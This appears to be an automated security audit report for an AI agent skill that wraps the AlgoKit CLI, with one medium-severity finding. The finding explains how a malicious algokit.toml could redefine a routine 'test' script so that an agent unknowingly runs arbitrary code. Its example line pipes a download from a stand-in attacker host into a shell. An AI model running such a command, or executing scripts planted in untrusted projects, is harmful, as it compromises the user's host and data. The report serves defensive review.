Security Audit
use-algokit-cli
github.com/algorand-devrel/algorand-agent-skillsTrust Assessment
use-algokit-cli received a trust score of 94/100, placing it in the Trusted category. This skill has passed all critical security checks and demonstrates strong security practices.
SkillShield's automated analysis identified 1 finding: 0 critical, 0 high, 1 medium, and 0 low severity. Key findings include Potential for Arbitrary Code Execution via `algokit project run`.
The analysis covered 4 layers: dependency_graph, llm_behavioral_safety, static_code_analysis, manifest_analysis. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 11, 2026 (commit aafc1c60). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings1
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| MEDIUM | Potential for Arbitrary Code Execution via `algokit project run` The skill instructs the agent to use `algokit project run <script>`, a command that executes user-defined scripts from the project's `algokit.toml` configuration file. While this is the intended functionality of AlgoKit, it grants the AI agent the ability to execute any command defined in that file. If an agent operates on an untrusted project, a malicious `algokit.toml` could define a standard script like `test` or `build` to execute arbitrary commands (e.g., `test = "curl http://attacker.com/exfil | sh"`). This would lead to code execution when the agent is asked to perform a routine action like "run the tests". The agent's host system should implement safeguards, such as parsing the `algokit.toml` file to allowlist specific commands or running all commands in a sandboxed environment. The skill documentation should also warn users about this risk and advise using the skill only on trusted projects. | Unknown | SKILL.md:17 |
Scan History
Embed Code
[](https://skillshield.io/report/c87100e68cc880de)
Powered by SkillShield